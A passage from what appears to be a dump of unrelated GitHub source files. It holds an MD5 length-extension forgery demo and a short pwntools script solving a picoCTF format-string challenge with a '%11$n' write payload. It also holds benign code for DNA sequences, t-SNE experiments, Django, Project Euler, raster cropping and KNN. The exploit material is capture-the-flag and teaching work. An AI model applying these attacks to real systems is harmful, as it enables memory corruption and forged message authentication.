print(hashlib.md5(input.encode('utf-8')).hexdigest())
if __name__ == "__main__":
# test("crypt")
# secret = b'this is a secret' # 256 bit
# MAC = edc707dda43b36386f36052b3446941f
# message is b'ciao'
# keyed-digest k || message --> MAC = m
# starting from m --> we build keyed-digest(message||additional_data) without knowing k
test_secret = b'my test secret'
message = b'ciao' # public data (we are considering integrity, not confidentiality)
to_add = b' ciao'
#
# message + something_else --> without knowing the secret we want to compute the MAC of message + something_else
m = md5()
m.update(test_secret+message)
print(m.hexdigest())
known_MAC = m.digest() # --> adding the padding
print("state =",end=' ')
print(m.state)
print(m.digest())
print("encode =" + str(_encode(m.state,md5.digest_size)))
print("decode =" + str(_decode(m.digest(), md5.digest_size)))
# m.state --> secret+message
# m.digest --> secret+message+padding
# MAC of
#this is the lenght extension attack
m2 = md5(state=known_MAC, count = 512) #
m2.update(to_add)
print(m2.hexdigest())
#m2.hexdigest() should be the digest of test_secret + message + to_add
m3 = md5()
pad = padding(len(test_secret+message)*8)
m3.update(test_secret+message+ pad + to_add) # padding len(test_secret+message+ pad + to_add)
print(m3.hexdigest())
m4 = md5()
print(m.state)
| [
"[email protected]"
] | |
139b190ed31d88e56031de11be07c1f4fe9af5b7 | 9785b5c8b997bc0241e8520b77bc7078d4c29029 | /2018/picoctf/authenticate/exp.py | 83476da0dbc034dd4f749350c757a078311fe650 | [] | no_license | lucyoa/ctfs | 4619571201bece8d7a6545f0cdc8291c153b6ef2 | 0726ee26052eabc5ee854fd976d0905d40668e8d | refs/heads/master | 2020-07-31T01:49:00.736206 | 2020-06-25T19:46:53 | 2020-06-25T19:46:53 | 210,439,562 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 268 | py | #!/usr/bin/env python
from pwn import *
# r = process("./auth")
r = remote("2018shell.picoctf.com", 52918)
r.recvuntil("Would you like to read the flag? (yes/no)\n")
payload = (
p32(0x804a04c) +
"%11$n"
)
r.sendline(payload)
print(r.recvall())
r.close()
| [
"[email protected]"
] | |
88670494c7efdc1374cdfb661ffb1ffe4df35dbf | 50e8f9a4b25d543932d0a43656c12ec0b31fe87b | /random_seq.py | 00513e85ca16590a6737c09d71f90fbf6047b890 | [] | no_license | 1gnatov/NRSAAM | b95e5f5d621863e73117d3014c67dc34bf1de40b | 752cab91455bfcbda7f54f9f20bb336ea18daa02 | refs/heads/master | 2016-09-06T17:18:02.471806 | 2013-10-30T21:01:55 | 2013-10-30T21:01:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,449 | py | """
idea = using lists of nuc_seq with separate nucl as lists ['G'], ['A'] etc.
each round we look at unamb nucl - count lenth of this letter in dict{'D'=[['A'],['G'], ['T'], ..}
and multiply starting lists to the len(dict['D']) and appending letter-lists from dict
at the end all lists are joining with ''.join()
restrictase = they have to be palindromes
[ [['C'], ['T'], ['C'], ['G'], ['G'], ['G']]
[['C'], ['C'], ['C'], ['G'], ['G'], ['G']]
[['C'], ['T'], ['C'], ['G'], ['A'], ['G']]
[['C'], ['C'], ['C'], ['G'], ['A'], ['G']]
]
"""
#nonstanddict = {['D']:[['G'], ['A'], ['T']], ['H']:[['A'], ['T'], ['C']], ['N']:[['G'], ['A'], ['T'], ['C']], ['S']:[['G'], ['C']], ['R']:[['G'], ['A']], ['W']:[['A'], ['T']], ['Y']:[['T'], ['C']]}
nstanddict = {'D':[['G'], ['A'], ['T']], 'H':[['A'], ['T'], ['C']], 'N':[['G'], ['A'], ['T'], ['C']], 'S':[['G'], ['C']], 'R':[['G'], ['A']], 'W':[['A'], ['T']], 'Y':[['T'], ['C']], 'A':['A'], 'G':['G'], 'C':['C'], 'T':['T']}
start_seq = 'CYCGRG'
def prepare_seq_list(string):
'''
converting 'AGTCAG' to [['A'], ['G'] ...] list
'''
result = []
for char in string:
result.append([char])
return result
start_list = prepare_seq_list(start_seq)
print start_list
def multisequence(list_seq):
result = [[], [], [], [], [], []]
for element in list_seq:
for i in range(0, len(nstanddict[element])):
result[i].append([element])
return result
res_list = multisequence(start_seq)
print res_list | [
"[email protected]"
] | |
a88bad32c4bc419dba4eec0c3f96db48fa505f5b | 149273fc2e0dd4b86f7eadc59a548e6caf154288 | /experiments/run_experiments_tSNE.py | 113b171133f943f80100d908c0283e27da55947a | [
"Apache-2.0"
] | permissive | Liyubov/PaCMAP | 65eadb48c45187a8c8515fb626fd2ad63af0f2b2 | 91479ba60737a47eaa57dbd52fcac155821e9269 | refs/heads/master | 2023-08-02T15:23:00.580215 | 2021-10-09T02:31:10 | 2021-10-09T02:31:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,478 | py | import FlowCal
import json
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn import manifold, datasets
from time import time
from MulticoreTSNE import MulticoreTSNE as TSNE
from sklearn.decomposition import PCA
from sklearn.datasets import make_swiss_roll, make_s_curve
def data_prep(data_path, dataset='MNIST', size=10000):
'''
This function loads the dataset as numpy array.
Input:
data_path: path of the folder you store all the data needed.
dataset: the name of the dataset.
size: the size of the dataset. This is useful when you only
want to pick a subset of the data
Output:
X: the dataset in numpy array
labels: the labels of the dataset.
'''
if dataset == 'MNIST':
X = np.load(data_path + '/mnist_images.npy', allow_pickle=True).reshape(70000, 28*28)
labels = np.load(data_path + '/mnist_labels.npy', allow_pickle=True)
elif dataset == 'FMNIST':
X = np.load(data_path + '/fmnist_images.npy', allow_pickle=True).reshape(70000, 28*28)
labels = np.load(data_path + '/fmnist_labels.npy', allow_pickle=True)
elif dataset == 'coil_20':
X = np.load(data_path + '/coil_20.npy', allow_pickle=True).reshape(1440, 128*128)
labels = np.load(data_path + '/coil_20_labels.npy', allow_pickle=True)
elif dataset == 'coil_100':
X = np.load(data_path + '/coil_100.npy', allow_pickle=True).reshape(7200, -1)
labels = np.load(data_path + '/usr/xtmp/hyhuang/MNIST/coil_100_labels.npy', allow_pickle=True)
elif dataset == 'mammoth':
with open(data_path + '/mammoth_3d.json', 'r') as f:
X = json.load(f)
X = np.array(X)
with open(data_path + '/mammoth_umap.json', 'r') as f:
labels = json.load(f)
labels = labels['labels']
labels = np.array(labels)
elif dataset == 'mammoth_50k':
with open(data_path + '/mammoth_3d_50k.json', 'r') as f:
X = json.load(f)
X = np.array(X)
labels = np.zeros(10)
elif dataset == 'Flow_cytometry':
X = FlowCal.io.FCSData(data_path + '/11-12-15_314.fcs')
labels = np.zeros(10)
elif dataset == 'Mouse_scRNA':
data = pd.read_csv(data_path + '/GSE93374_Merged_all_020816_BatchCorrected_LNtransformed_doubletsremoved_Data.txt', sep='\t')
X = data.to_numpy()
labels = pd.read_csv(data_path + '/GSE93374_cell_metadata.txt', sep='\t')
elif dataset == 'swiss_roll':
X, labels = make_swiss_roll(n_samples=size, random_state=20200202)
elif dataset == 's_curve':
X, labels = make_s_curve(n_samples=size, random_state=20200202)
elif dataset == 's_curve_hole':
X, labels = make_s_curve(n_samples=size, random_state=20200202)
anchor = np.array([0, 1, 0])
indices = np.sum(np.square(X-anchor), axis=1) > 0.3
X, labels = X[indices], labels[indices]
elif dataset == 'swiss_roll_hole':
X, labels = make_swiss_roll(n_samples=size, random_state=20200202)
anchor = np.array([-10, 10, 0])
indices = np.sum(np.square(X-anchor), axis=1) > 20
X, labels = X[indices], labels[indices]
elif dataset == 'kddcup99':
X = np.load(data_path + '/KDDcup99_float.npy', allow_pickle=True)
labels = np.load(data_path + '/KDDcup99_labels_int.npy', allow_pickle=True)
elif dataset == '20NG':
X = np.load(data_path + '/20NG.npy', allow_pickle=True)
labels = np.load(data_path + '/20NG_labels.npy', allow_pickle=True)
elif dataset == 'USPS':
X = np.load(data_path + '/USPS.npy', allow_pickle=True)
labels = np.load(data_path + '/USPS_labels.npy', allow_pickle=True)
elif dataset == 'cifar10':
X = np.load(data_path + '/cifar10_imgs.npy', allow_pickle=True)
labels = np.load('/cifar10_labels.npy', allow_pickle=True)
elif dataset == 'cifar100':
X = np.load(data_path + '/cifar100_imgs.npy', allow_pickle=True)
labels = np.load('/cifar100_labels.npy', allow_pickle=True)
else:
print('Unsupported dataset')
assert(False)
return X[:size], labels[:size]
def experiment(X, method='PaCMAP', **kwargs):
if method == 'PaCMAP':
transformer = PaCMAP(**kwargs)
elif method == 'UMAP':
transformer = umap.UMAP(**kwargs)
elif method == 'TriMAP':
transformer = trimap.TRIMAP(**kwargs)
elif method == 'LargeVis':
transformer = LargeVis(**kwargs)
elif method == 't-SNE':
transformer = TSNE(**kwargs)
else:
print("Incorrect method specified")
assert(False)
start_time = time()
X_low = transformer.fit_transform(X)
total_time = time() - start_time
print("This run's time:")
print(total_time)
return X_low, total_time
def experiment_five(X, method='PaCMAP', **kwargs):
length = X.shape[0]
X_lows, all_times = [], []
for i in range(5):
X_low, all_time = experiment(X, method, **kwargs)
X_lows.append(X_low)
all_times.append(all_time)
X_lows = np.array(X_lows)
all_times = np.array(all_times)
return X_lows, all_times
def main(data_path, output_path, dataset_name='MNIST', size=10000000):
X, labels = data_prep(data_path, dataset=dataset_name, size=size)
if dataset_name == 'Mouse_scRNA':
pca = PCA(n_components=1000)
X = pca.fit_transform(X)
elif X.shape[1] > 100:
pca = PCA(n_components=100)
X = pca.fit_transform(X)
print("Data loaded successfully")
methods = ['t-SNE']
args = {'t-SNE':[{'perplexity':10}, {'perplexity':20}, {'perplexity':40}]}
print("Experiment started")
for method in methods:
parameters = args[method]
for parameter in parameters:
X_low, total_time = experiment_five(X, method, **parameter)
if 'n_neighbors' in parameter:
n_neighbors = parameter['n_neighbors']
elif 'perplexity' in parameter:
n_neighbors = parameter['perplexity']
else:
n_neighbors = 10 # Default value
loc_string = output_path + \
'{dataset_name}_{method}_{n_neighbors}'.format(dataset_name=dataset_name, method=method, n_neighbors=n_neighbors)
np.save(loc_string, X_low)
avg_time = np.mean(total_time)
print('Average time for method {method} on {dataset_name} with param={n_neighbors} is {avg_time}'.format(dataset_name=dataset_name, method=method, n_neighbors=n_neighbors, avg_time=avg_time))
print('The detailed time is {total_time}'.format(total_time=total_time))
return 0
if __name__ == '__main__':
# Please define the data_path and output_path here
data_path = "../data/"
output_path = "../output/"
main(data_path, output_path, 'MNIST')
main(data_path, output_path, 'FMNIST')
main(data_path, output_path, 'coil_20')
main(data_path, output_path, 'coil_100')
main(data_path, output_path, 'Mouse_scRNA')
main(data_path, output_path, 'mammoth')
main(data_path, output_path, 's_curve', 10000)
main(data_path, output_path, 's_curve_hole', 10000)
main(data_path, output_path, '20NG', 100000)
main(data_path, output_path, 'USPS', 100000)
main(data_path, output_path, 'kddcup99', 10000000)
main(data_path, output_path, 'cifar10', 10000000)
main(data_path, output_path, 'cifar100', 10000000) | [
"[email protected]"
] | |
a8bbf6d28fbb80a9b6db4877e2b4247f033da24e | 0412101e2cea53b471c0b79e531b30c10dbbeeb2 | /read_statistics/migrations/0002_readdetail.py | 8c7c4fc61bf78b165822c00ef689b9a741c41b5b | [] | no_license | Iceinmyvein/mysite | da42f142650741e740ac92be974915ee34643951 | 9ed82d63b605544d516869eb0f37cf862181d68a | refs/heads/main | 2023-03-09T14:00:55.103640 | 2021-03-02T07:45:51 | 2021-03-02T07:45:51 | 342,994,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 908 | py | # Generated by Django 3.1.5 on 2021-02-08 02:18
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('read_statistics', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ReadDetail',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField(default=django.utils.timezone.now)),
('read_num', models.IntegerField(default=0)),
('object_id', models.PositiveIntegerField()),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.contenttype')),
],
),
]
| [
"[email protected]"
] | |
e7bb53eebb76b023b8e96330bb939ceaa0ee7d5e | 5e3fb75d905481334177acba84f1e58839ecbab0 | /euler92.py | 1b58d9fa322e96f80ffc01fe7d09911cf2a5fc10 | [] | no_license | fpgmaas/project-euler | e850acc570d2adc0cb23f9f92775c53592867313 | 738d13b21cbb156af874710b6d7269d963056000 | refs/heads/master | 2021-09-14T02:01:45.900043 | 2018-05-07T12:22:08 | 2018-05-07T12:22:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 284 | py |
def func(x):
y = list(str(x))
return(sum([int(n)**2 for n in y]))
total=0
set89 = set()
for i in range(2,10000000):
x = i
while x!=1 and x!=89:
x = func(x)
if(x in set89): x=89
if x == 89:
total+=1
if i<600 :set89.add(i) | [
"[email protected]"
] | |
60647221ba6f895f8718efe359f5473970104ffa | 4cca71c31c7f89a219634d79c21404ca4eabe436 | /d2l_thrive/base.py | c3c0a4b0adc980e897da0d5958bd97a262716935 | [] | no_license | ucalgary/d2l-thrive-python | 1a03fb99d5e0d370f3a1349cb0d4231895a5e19e | 8c22d019c202aaa997c7333cf6711338c84621ee | refs/heads/master | 2021-01-10T02:02:58.076443 | 2018-03-12T18:04:42 | 2018-03-12T18:04:42 | 43,977,081 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,485 | py | #!/usr/bin/env python
# coding=utf-8
import os
import sys
from couchdb.client import Database
from couchdb.http import ResourceNotFound, ResourceConflict
class BaseObject(object):
def __init__(self, args=None):
self._args = args or sys.argv[1:]
def run(self):
"""The main runloop. Scripts should call this method
after instantiating an object."""
parser = self.argument_parser()
self.args = parser.parse_args(self._args)
self.unpack_arguments(self.args)
# Give subclasses an opportunity to perform additional setup functions
# before main is invoked.
self.prepare_for_main()
if not self.args.background:
result = self.main()
else:
import daemon
import grp
import pwd
import signal
from lockfile.pidlockfile import PIDLockFile
# Create and configure the daemon context
ctx = daemon.DaemonContext()
ctx.umask = 0o027
ctx.pidfile = PIDLockFile(self.args.pidfile)
# ctx.signal_map = {
# signal.SIGTERM: # program_cleanup,
# signal.SIGUP: 'terminate',
# signal.SIGUSR1: # reload_program_config
# }
ctx.uid = pwd.getpwnam('nobody').pw_uid
ctx.gid = grp.getgrnam('nobody').gr_gid
# Daemonize by running within the daemon context
with ctx:
result = self.main()
# Exit with the code returned from main.
sys.exit(result)
# Configuring the observer
def argument_parser(self):
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-b', '--background', help='run as a background process', default=False, action='store_true')
parser.add_argument('-p', '--pidfile', help='set the background PID FILE', default='/var/run/%s.pid' % self.__class__.__name__)
return parser
def unpack_arguments(self, args):
pass
def prepare_for_main(self):
"""A stub method for library classes to optionally implement. Typically,
this is only used by classes that expect to be subclassed for actual use and
wish to perform some functions at the start of main, without implementing
main so that further subclasses can implement main to perform their actual
work. Subclasses should call super on this function if it is implemented.
"""
pass
def main(self):
"""A stub method for subclasses to implement. Subclasses should override
``main`` to perform their specific functions.
"""
pass
class LMSObject(BaseObject):
def __init__(self, args=None, connection_info=None):
super(LMSObject, self).__init__(args=args)
def couchdb_client(self, name):
return self._named_client(name, self.create_couchdb_client)
def _named_client(self, name, create_f):
key_prefix = name + '_'
info_keys = [key for key in os.environ.keys() if key.startswith(key_prefix)]
if len(info_keys) == 0:
return None
# Dictionary comprehension replaced for Python 2.6 compatibility
# info = { key[len(key_prefix):]: os.environ[key] for key in info_keys }
info = dict((key[len(key_prefix):], os.environ[key]) for key in info_keys)
if 'URL' in info:
url = info['URL']
elif 'RESOURCE' in info:
import pkg_resources
path = pkg_resources.resource_filename('adsm', info['RESOURCE'])
url = 'file://%s' % path
args = info.get('args', {})
return create_f(url, **args)
def create_couchdb_client(self, db_url, require_exists=True, **args):
db = Database(db_url)
if require_exists:
try:
db.info()
except ResourceNotFound:
raise Exception('No database found at %s' % db.resource.url)
return db
| [
"[email protected]"
] | |
3482043d0c0a812ef98f1ffb1e3a0e6e30a7ab0d | a35a56e1908a483be474bfc9d90de17ed62572c1 | /flights/migrations/0001_initial.py | 13f3fd70ddd1878edc1e1c249d243c09089d3a24 | [] | no_license | glezluis/ca-reango | 38156c189933a23916060d17af2178d40d37ebe3 | ce3747796fe3887db531bf30f167695ee2a3346d | refs/heads/main | 2023-06-05T13:34:31.405927 | 2021-06-29T03:20:44 | 2021-06-29T03:20:44 | 381,147,715 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 664 | py | # Generated by Django 3.2.2 on 2021-05-13 04:27
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Flight',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('origin', models.CharField(max_length=255)),
('destination', models.CharField(max_length=255)),
('depart_date', models.DateField()),
('return_date', models.DateField()),
],
),
]
| [
"[email protected]"
] | |
c801f423eba575edaad8ae847ba8affbbb0388d1 | 7e2214619d5948d0d5f7e22f46dee679d722d7b3 | /dealOrNoDeal.py | 309ffe88c017c45a4345d69b454a2286181be26f | [] | no_license | udwivedi394/misc | ef6add31a92e0d2d0505e8be016f0a868a6ac730 | 64dffb5db04c38465fffb415bec1d433b1caa8f6 | refs/heads/master | 2021-09-09T06:16:32.124586 | 2018-03-14T05:10:55 | 2018-03-14T05:10:55 | 116,167,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,934 | py | #Nest away
import sys
def dealorNoDeal05(A,B):
lookup = [B-i for i in A]
maxi = 0
for i in xrange(1,len(lookup)):
if lookup[i] >= 0:
lookup[i] = lookup[i]+(lookup[i-1] if lookup[i-1] >=0 else 0)
maxi = max(maxi,lookup[i])
return maxi
def dealorNoDeal(A,B):
lookup = A#[B-i for i in A]
maxi = 0
for i in xrange(len(lookup)):
lookup[i] = max(lookup[i],lookup[i]+lookup[i-1] if i>0 else 0)
maxi = max(maxi,lookup[i])
return maxi
def dealorNoDeal03(A,B):
lookup = A
for i in xrange(len(lookup)):
lookup[i] = B-lookup[i]
maxi = 0
for i in xrange(1,len(lookup)):
if lookup[i] >= 0:
lookup[i] = lookup[i]+(lookup[i-1] if lookup[i-1] >=0 else 0)
maxi = max(maxi,lookup[i])
return maxi
def dealorNoDeal04(A,B):
lookup = A
maxi = 0
for i in xrange(len(lookup)):
if B-lookup[i] >= 0:
lookup[i] = (B-lookup[i])+(lookup[i-1] if i > 0 and lookup[i-1] >=0 else 0)
maxi = max(maxi,lookup[i])
else:
lookup[i] = B-lookup[i]
print lookup
return maxi
"""
if __name__=="__main__":
f1 = open("testCaseMaxSeq02.txt",'r')
for x in xrange(int(f1.readline().strip())):
#n,c = map(int,sys.stdin.readline().strip().split())
n = map(int,f1.readline().strip().split())
A = map(int,f1.readline().strip().split())
c = 0
result = dealorNoDeal(A,c)
sys.stdout.write(str(result))
print
f1.close()
"""
if __name__=="__main__":
for x in xrange(int(sys.stdin.readline().strip())):
n,c = map(int,sys.stdin.readline().strip().split())
#n = map(int,sys.stdin.readline().strip().split())
A = map((lambda x: c-int(x)),sys.stdin.readline().strip().split())
#c = 0
result = dealorNoDeal(A,c)
sys.stdout.write(str(result))
print
#"""
| [
"[email protected]"
] | |
ae7a1e257d3423cfd604b1e6c27ffe19ee1012f5 | 6b3e8b4291c67195ad51e356ba46602a15d5fe38 | /rastervision2/examples/utils.py | d521e74560b2de4494f0d0ff4344208ee3e221b0 | [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | csaybar/raster-vision | 4f5bb1125d4fb3ae5c455db603d8fb749221dd74 | 617ca15f64e3b8a391432306a743f7d0dfff352f | refs/heads/master | 2021-02-26T19:02:53.752971 | 2020-02-27T17:25:31 | 2020-02-27T17:25:31 | 245,547,406 | 2 | 1 | NOASSERTION | 2020-03-07T01:24:09 | 2020-03-07T01:24:08 | null | UTF-8 | Python | false | false | 4,864 | py | import csv
from io import StringIO
import tempfile
import os
import rasterio
from shapely.strtree import STRtree
from shapely.geometry import shape, mapping
import shapely
from rastervision.core import Box
from rastervision.data import RasterioCRSTransformer, GeoJSONVectorSource
from rastervision.utils.files import (file_to_str, file_exists, get_local_path,
upload_or_copy, make_dir, json_to_file)
from rastervision.filesystem import S3FileSystem
def str_to_bool(x):
if type(x) == str:
if x.lower() == 'true':
return True
elif x.lower() == 'false':
return False
else:
raise ValueError('{} is expected to be true or false'.format(x))
return x
def get_scene_info(csv_uri):
csv_str = file_to_str(csv_uri)
reader = csv.reader(StringIO(csv_str), delimiter=',')
return list(reader)
def crop_image(image_uri, window, crop_uri):
im_dataset = rasterio.open(image_uri)
rasterio_window = window.rasterio_format()
im = im_dataset.read(window=rasterio_window)
with tempfile.TemporaryDirectory() as tmp_dir:
crop_path = get_local_path(crop_uri, tmp_dir)
make_dir(crop_path, use_dirname=True)
meta = im_dataset.meta
meta['width'], meta['height'] = window.get_width(), window.get_height()
meta['transform'] = rasterio.windows.transform(
rasterio_window, im_dataset.transform)
with rasterio.open(crop_path, 'w', **meta) as dst:
dst.colorinterp = im_dataset.colorinterp
dst.write(im)
upload_or_copy(crop_path, crop_uri)
def save_image_crop(image_uri,
image_crop_uri,
label_uri=None,
label_crop_uri=None,
size=600,
min_features=10,
vector_labels=True):
"""Save a crop of an image to use for testing.
If label_uri is set, the crop needs to cover >= min_features.
Args:
image_uri: URI of original image
image_crop_uri: URI of cropped image to save
label_uri: optional URI of label file
label_crop_uri: optional URI of cropped labels to save
size: height and width of crop
Raises:
ValueError if cannot find a crop satisfying min_features constraint.
"""
if not file_exists(image_crop_uri):
print('Saving test crop to {}...'.format(image_crop_uri))
old_environ = os.environ.copy()
try:
request_payer = S3FileSystem.get_request_payer()
if request_payer == 'requester':
os.environ['AWS_REQUEST_PAYER'] = request_payer
im_dataset = rasterio.open(image_uri)
h, w = im_dataset.height, im_dataset.width
extent = Box(0, 0, h, w)
windows = extent.get_windows(size, size)
if label_uri and vector_labels:
crs_transformer = RasterioCRSTransformer.from_dataset(
im_dataset)
vs = GeoJSONVectorSource(label_uri, crs_transformer)
geojson = vs.get_geojson()
geoms = []
for f in geojson['features']:
g = shape(f['geometry'])
geoms.append(g)
tree = STRtree(geoms)
def p2m(x, y, z=None):
return crs_transformer.pixel_to_map((x, y))
for w in windows:
use_window = True
if label_uri and vector_labels:
w_polys = tree.query(w.to_shapely())
use_window = len(w_polys) >= min_features
if use_window and label_crop_uri is not None:
print('Saving test crop labels to {}...'.format(
label_crop_uri))
label_crop_features = [
mapping(shapely.ops.transform(p2m, wp))
for wp in w_polys
]
label_crop_json = {
'type':
'FeatureCollection',
'features': [{
'geometry': f
} for f in label_crop_features]
}
json_to_file(label_crop_json, label_crop_uri)
if use_window:
crop_image(image_uri, w, image_crop_uri)
if not vector_labels and label_uri and label_crop_uri:
crop_image(label_uri, w, label_crop_uri)
break
if not use_window:
raise ValueError('Could not find a good crop.')
finally:
os.environ.clear()
os.environ.update(old_environ)
| [
"[email protected]"
] | |
feac86219e5f5519a0cbe579616b2954b9665b74 | bd185d3a4221c61f16fa52e282ce3ae5fcca1007 | /node_modules/node-sass/build/config.gypi | 479603f613e38a9dc4f31a142cdb320a66bda473 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | vijay-vadlamani/wiki_viewer | 74f2f21b495e30333479d41d167493c329ff4e78 | bbb5755ade4a85bf6255f99f3dc4c00d5fc77773 | refs/heads/master | 2020-03-18T10:32:54.152037 | 2018-05-23T19:56:26 | 2018-05-23T19:56:26 | 134,618,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,270 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"coverage": "false",
"debug_devtools": "node",
"debug_http2": "false",
"debug_nghttp2": "false",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_file": "icudt60l.dat",
"icu_data_in": "../../deps/icu-small/source/data/in/icudt60l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "60",
"llvm_version": 0,
"node_byteorder": "little",
"node_enable_d8": "false",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_module_version": 57,
"node_no_browser_globals": "false",
"node_prefix": "/usr/local",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_nghttp2": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_v8_platform": "true",
"node_without_node_options": "false",
"openssl_fips": "",
"openssl_no_asm": 0,
"shlib_suffix": "57.dylib",
"target_arch": "x64",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_enable_inspector": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_promise_internal_field_count": 1,
"v8_random_seed": 0,
"v8_trace_maps": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/yvxv011/.node-gyp/8.11.1",
"standalone_static_library": 1,
"libsass_ext": "",
"libsass_cflags": "",
"libsass_ldflags": "",
"libsass_library": "",
"save_dev": "",
"legacy_bundling": "",
"dry_run": "",
"viewer": "man",
"only": "",
"commit_hooks": "true",
"browser": "",
"also": "",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"shell": "/bin/bash",
"maxsockets": "50",
"init_author_url": "",
"shrinkwrap": "true",
"parseable": "",
"metrics_registry": "https://registry.npmjs.org/",
"timing": "",
"init_license": "ISC",
"if_present": "",
"sign_git_tag": "",
"init_author_email": "",
"cache_max": "Infinity",
"long": "",
"local_address": "",
"git_tag_version": "true",
"cert": "",
"registry": "https://registry.npmjs.org/",
"fetch_retries": "2",
"versions": "",
"message": "%s",
"key": "",
"globalconfig": "/usr/local/etc/npmrc",
"prefer_online": "",
"logs_max": "10",
"always_auth": "",
"global_style": "",
"cache_lock_retries": "10",
"heading": "npm",
"searchlimit": "20",
"read_only": "",
"offline": "",
"fetch_retry_mintimeout": "10000",
"json": "",
"access": "",
"allow_same_version": "",
"https_proxy": "",
"engine_strict": "",
"description": "true",
"userconfig": "/Users/yvxv011/.npmrc",
"init_module": "/Users/yvxv011/.npm-init.js",
"cidr": "",
"user": "",
"node_version": "8.11.1",
"save": "true",
"ignore_prepublish": "",
"editor": "vi",
"auth_type": "legacy",
"tag": "latest",
"script_shell": "",
"progress": "true",
"global": "",
"searchstaleness": "900",
"optional": "true",
"ham_it_up": "",
"save_prod": "",
"force": "",
"bin_links": "true",
"searchopts": "",
"node_gyp": "/usr/local/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js",
"depth": "Infinity",
"sso_poll_frequency": "500",
"rebuild_bundle": "true",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"tag_version_prefix": "v",
"strict_ssl": "true",
"sso_type": "oauth",
"scripts_prepend_node_path": "warn-only",
"save_prefix": "^",
"ca": "",
"save_exact": "",
"group": "71667744",
"fetch_retry_factor": "10",
"dev": "",
"version": "",
"prefer_offline": "",
"cache_lock_stale": "60000",
"otp": "",
"cache_min": "10",
"searchexclude": "",
"cache": "/Users/yvxv011/.npm",
"color": "true",
"package_lock": "true",
"package_lock_only": "",
"save_optional": "",
"ignore_scripts": "",
"user_agent": "npm/5.6.0 node/v8.11.1 darwin x64",
"cache_lock_wait": "10000",
"production": "",
"send_metrics": "",
"save_bundle": "",
"umask": "0022",
"node_options": "",
"init_version": "1.0.0",
"init_author_name": "",
"git": "git",
"scope": "",
"unsafe_perm": "true",
"tmp": "/var/folders/1g/46tcrdfj211c6_mksjhy8y685whv9l/T",
"onload_script": "",
"prefix": "/usr/local",
"link": ""
}
}
| [
"[email protected]"
] | |
e2c308aeae8a487bcc9a87178325d76964ca04fa | 1cc11e1ee5bb3c39e6a61853a1913ef9aef60e5d | /neighbors.py | e53f3722ab3024e56282e997f61f39434cc68259 | [] | no_license | hzc0097/machine-learning | a21dce5b1fe4838baa84147af10542401f2186e0 | af4929c133a0c6f5c17531540885772fca0ebc72 | refs/heads/master | 2023-07-31T17:05:34.013712 | 2021-09-03T16:21:30 | 2021-09-03T16:21:30 | 402,630,292 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,790 | py | import pandas as pd
import numpy as np
import time
from sklearn import neighbors
from sklearn.model_selection import train_test_split
from matplotlib import pyplot as plt
import pickle
def singleRunKNN():
# read dataset
df = pd.read_parquet('fullDataPASFaster.parquet')
df.drop(['summonerName'], 1, inplace=True)
df.fillna(0, inplace=True)
X = np.array(df.drop(['win'], 1))
y = np.array(df['win'])
X_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.2)
clf = neighbors.KNeighborsClassifier()
clf.fit(X_train,y_train)
accuracy = clf.score(X_test, y_test)
print(X)
print(accuracy)
def assess(df, X_test, y_test):
startTime = time.perf_counter()
X_train = np.array(df.drop(['win'], 1))
y_train = np.array(df['win'])
clf = neighbors.KNeighborsClassifier()
print(f"training start {time.perf_counter()}")
clf.fit(X_train, y_train)
print(f"training done {time.perf_counter()}")
endTime = time.perf_counter()
runTime = endTime - startTime
accuracy = clf.score(X_test, y_test)
print(f"testing done {time.perf_counter()}")
endTime = time.perf_counter()
runTime2 = endTime - startTime
return clf, accuracy, runTime, runTime2
def kNNGraphRun():
df = pd.read_parquet('fullDataPASFaster.parquet')
